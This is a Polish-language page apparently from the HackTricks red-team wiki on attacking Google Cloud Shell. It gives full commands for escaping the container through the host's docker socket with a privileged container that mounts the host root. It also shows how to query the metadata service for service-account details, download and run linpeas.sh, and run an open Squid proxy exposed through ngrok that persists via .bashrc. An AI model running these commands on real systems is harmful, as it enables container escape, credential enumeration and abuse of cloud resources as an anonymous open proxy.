Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert) ! Inne sposoby wsparcia HackTricks:
Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF , sprawdź PLAN SUBSKRYPCJI !
Cloud Shell
Aby uzyskać więcej informacji na temat Cloud Shell, sprawdź:
page GCP - Cloud Shell Enum Ucieczka z kontenera
Należy zauważyć, że Google Cloud Shell działa wewnątrz kontenera, można łatwo uciec do hosta , wykonując:
Copy sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
To nie jest uważane za podatność przez Google, ale daje szerszą wizję tego, co dzieje się w tym środowisku.
Ponadto, zauważ, że z hosta możesz znaleźć token konta usługi:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
Z następującymi zakresami:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
Wylicz metadane za pomocą LinPEAS:
Copy cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
Po użyciu https://github.com/carlospolop/bf_my_gcp_permissions z tokenem konta usługi nie znaleziono żadnych uprawnień ...
Użyj go jako proxy
Jeśli chcesz użyć swojej instancji powłoki Google Cloud jako proxy, musisz uruchomić następujące polecenia (lub umieścić je w pliku .bashrc):
Copy sudo apt install -y squid
Tylko po to, abyś wiedział, Squid to serwer proxy HTTP. Utwórz plik squid.conf z następującymi ustawieniami:
Copy http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0 .0.0/0
http_access allow all
Skopiuj plik squid.conf do /etc/squid .
Copy sudo cp squid.conf /etc/squid
W końcu uruchom usługę squid:
Copy sudo service squid start
Użyj ngrok, aby umożliwić dostęp do proxy z zewnątrz:
Po uruchomieniu skopiuj adres URL tcp://. Jeśli chcesz uruchomić proxy z przeglądarki, sugeruje się usunięcie części tcp:// i portu, a następnie wpisanie portu w polu portu ustawień proxy przeglądarki (squid to serwer proxy HTTP).
Aby lepiej korzystać z uruchamiania, plik .bashrc powinien zawierać następujące linie:
Copy sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok ; ./ngrok tcp 3128
Instrukcje zostały skopiowane z https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key . Sprawdź tę stronę, aby zobaczyć inne szalone pomysły na uruchamianie różnego rodzaju oprogramowania (w tym baz danych i nawet systemu Windows) w Cloud Shell.
Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert) ! Inne sposoby wsparcia HackTricks:
Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF , sprawdź PLAN SUBSKRYPCJI !
Last updated 2 months ago